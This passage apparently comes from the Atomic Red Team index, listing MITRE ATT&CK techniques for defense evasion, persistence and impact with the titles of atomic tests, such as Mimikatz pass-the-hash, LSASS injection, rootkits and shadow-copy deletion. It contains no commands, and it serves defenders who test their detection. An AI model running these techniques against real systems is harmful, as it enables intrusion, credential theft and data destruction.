- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.009 Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
- [T1218.010 Regsvr32](../../T1218.010/T1218.010.md)
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- Atomic Test #4: Regsvr32 Registering Non DLL [windows]
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #2: Masquerading as Linux crond process. [linux]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
- Atomic Test #6: Masquerading - non-windows exe running as windows exe [windows]
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow (Active Directory) [windows]
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 advpack.dll Execution [windows]
- Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #5: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
- Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows]
- Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
- [T1027.002 Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #1: Binary simply packed by UPX (linux) [linux]
- Atomic Test #2: Binary packed by UPX, with modified headers (linux) [linux]
- Atomic Test #3: Binary simply packed by UPX [macos]
- Atomic Test #4: Binary packed by UPX, with modified headers [macos]
- [T1036.006 Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename [macos]
- T1027.003 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1221 Template Injection](../../T1221/T1221.md)
- Atomic Test #1: WINWORD Remote Template Injection [windows]
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- Atomic Test #8: Windows - Timestomp a File [windows]
- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1218.012 Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1222.001 Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #3: attrib - Remove read-only attribute [windows]
- Atomic Test #4: attrib - hide file [windows]
- Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
- [T1220 XSL Script Processing](../../T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
# persistence
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
- Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
- Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [linux, macos]
- Atomic Test #2: CreateCronjob [linux, macos]
- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
- Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- [T1136.001 Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #6: Create a new Windows admin user [windows]
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin priviliges [windows]
- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1137.002 Office Test](../../T1137.002/T1137.002.md)
- Atomic Test #1: Office Application Startup Test Persistence [windows]
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- [T1037.005 Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.003 Web Shell](../../T1505.003/T1505.003.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# impact
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- Atomic Test #3: Remove Account From Domain Admin Group [windows]
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
- Atomic Test #5: PureLocker Ransom Note [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1489 Service Stop](../../T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
- Atomic Test #6: Shutdown System via `halt` - Linux [linux]
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# discovery
- T1087 Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
